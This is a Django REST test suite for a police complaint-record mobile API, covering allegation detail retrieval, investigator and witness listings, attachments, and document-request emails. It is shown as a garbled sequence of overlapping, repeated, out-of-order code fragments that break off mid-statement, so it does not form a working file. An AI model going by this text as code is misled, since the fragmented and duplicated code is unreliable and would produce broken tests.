allegation_count=1, sustained_count=0,", "'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ], 'attachments': [ { 'title': 'CR document', 'file_type':", "'112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233' })", "import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area =", "expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233',", "Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation,", "expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused':", "Ave, Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type':", "Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5,", "{ 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000',", "'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_not_found(self):", "'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name':", "= InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation,", "'5.5000', 'percentile_allegation': '4.4000', } ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document',", "first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 =", "= AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago',", "reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid':", "'<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation':", ") officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category':", "'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [ {", "category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001,", "allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document", "{ 'race': 'Black', 'gender': 'Male', 'age': 53 } ], 'point': { 'lon': 12.0,", "civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2,", "{'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST)", "'2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications", "}) def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please", "OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel", "28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator,", "'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal':", "5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator,", "allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc),", "rest_framework import status from robber import expect import pytz from data.factories import (", "1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, {", "from mock import patch from rest_framework.test import APITestCase from rest_framework import status from", "{'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with(", "'Email already added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk':", "response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email'", "AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police", "= AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001,", "3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ],", "], 'victims': [ { 'race': 'Black', 'gender': 'Male', 'age': 53 } ], 'point':", "}, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian':", "allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3", "officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation)", "'gender': 'Male', 'age': 53 } ], 'point': { 'lon': 12.0, 'lat': 21.0 },", "'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [", "officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase):", "officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator =", "current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan", "'45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk':", ") AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR',", "VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006,", "EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory(", "kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'}", "first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU',", "title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document',", "'Black', 'gender': 'Male', 'age': 18 } ], 'victims': [ { 'race': 'Black', 'gender':", "] }) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr',", ") expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321')", "'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id':", "'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation =", "'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements':", "InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2,", "expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_allegation(self): response =", "53 } ], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date':", "'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26',", "'2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications System', 'beat':", "'3.3000', } ], 'complainants': [ { 'race': 'Black', 'gender': 'Male', 'age': 18 }", "def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'}", "'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category':", "age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26),", "'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000',", "{ 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ { 'id': 123,", "21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan", "'Male', 'age': 53 } ], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary':", "'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count':", "InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import", "rest_framework.test import APITestCase from rest_framework import status from robber import expect import pytz", "officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993,", "self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}),", "'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20',", "city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26)", "allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9,", "AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter", "url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT )", "'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations',", ") OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28,", "allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None", "birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation =", "expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' },", "officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1,", "InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory(", "}, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation':", "tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4", "AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation,", "'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20',", "'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', },", "import reverse from django.contrib.gis.geos import Point from mock import patch from rest_framework.test import", "5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' ) ) officer = OfficerFactory( id=3,", "self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def", "id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT", "last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1,", "'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation':", "'6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>',", "= self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for", "for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST)", "'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_not_found(self): response =", "[ { 'race': 'Black', 'gender': 'Male', 'age': 53 } ], 'point': { 'lon':", "AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1,", "officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel", "= self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations',", "appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2,", "document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/',", "from rest_framework.test import APITestCase from rest_framework import status from robber import expect import", "ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True,", "'id': '123456', } ] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND)", "from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager", "trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21),", "url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid':", "final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator)", "star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510,", "InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' )", "file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory(", "'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3,", ") investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8,", "import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin,", "data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager from", "def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M',", "'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location':", "allegation_name='Secondary/Special Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1),", "CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import", "def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M',", "OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, )", "'4.4000', } ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/',", "'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation':", "tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5,", "InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3,", "'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police", "civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5,", "26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond',", "= self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already", "}, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave,", ") PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6,", "System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA',", "first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator,", "}) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post(", "OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory )", "officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': {", "import datetime, date from django.urls import reverse from django.contrib.gis.geos import Point from mock", "}) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo',", "= OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0,", "complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2,", "'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', },", "id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2,", "AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk':", "'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name':", "1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [ { 'title':", "2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary',", "1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May',", "complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002,", "'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [ { 'title': 'CR document', 'file_type':", "'Black', 'gender': 'Male', 'age': 53 } ], 'point': { 'lon': 12.0, 'lat': 21.0", "title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2',", "title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk':", "from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory,", "allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, )", "civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5,", "'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000',", "allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6,", 